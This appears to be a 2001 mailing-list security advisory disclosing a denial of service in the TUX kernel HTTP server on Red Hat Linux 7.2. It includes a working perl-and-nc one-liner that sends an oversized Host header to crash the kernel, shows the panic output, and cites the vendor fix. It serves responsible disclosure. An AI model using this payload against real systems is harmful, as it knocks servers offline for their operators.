TUX HTTPD Denial of Service Condition (RH Linux7.2)
=======================================

Background:
------------------

Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ Affinity,HTTP Compression, direct scatter-gather DMA etc.) and is meant to be used as the main HTTP server for static objects with requests for dynamic content being passed to a user-space HTTPD server such as Apache on same box when necessary. The TUX web server is disabled by default.

Vulnerability:
-------------------

It is possible to cause a denial of service condition by submitting an oversized "Host:" header request to the Tux daemon causing an assertion failure and eventual Kernel Panic. A total system reboot is required to return the box to full functionality. For example the following script:

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc <ip address> 80

Will cause the affected box to crash with the below output (edited for brevity):

Code: Bad EIP Value.
 (0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!

Despite being able to affect the contents of the EIP register this vulnerability cannot, to the best of my understanding, be utilised to provide for a remote root compromise.

System(s) tested:
--------------------------

RedHat Linux 7.2:

 0) Kernel(s) 2.4.7-10 and 2.4.9-7
 0) TUX-2.1.0-2.

Additional Notes:
-------------------------

securityredhat.com where advised of this issue 25 October 2001.

Solution:
------------

See Security Advisory - RHSA-2001:142-15

http://www.redhat.com/support/errata/RHSA-2001-142.html

===========================================================================================================

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]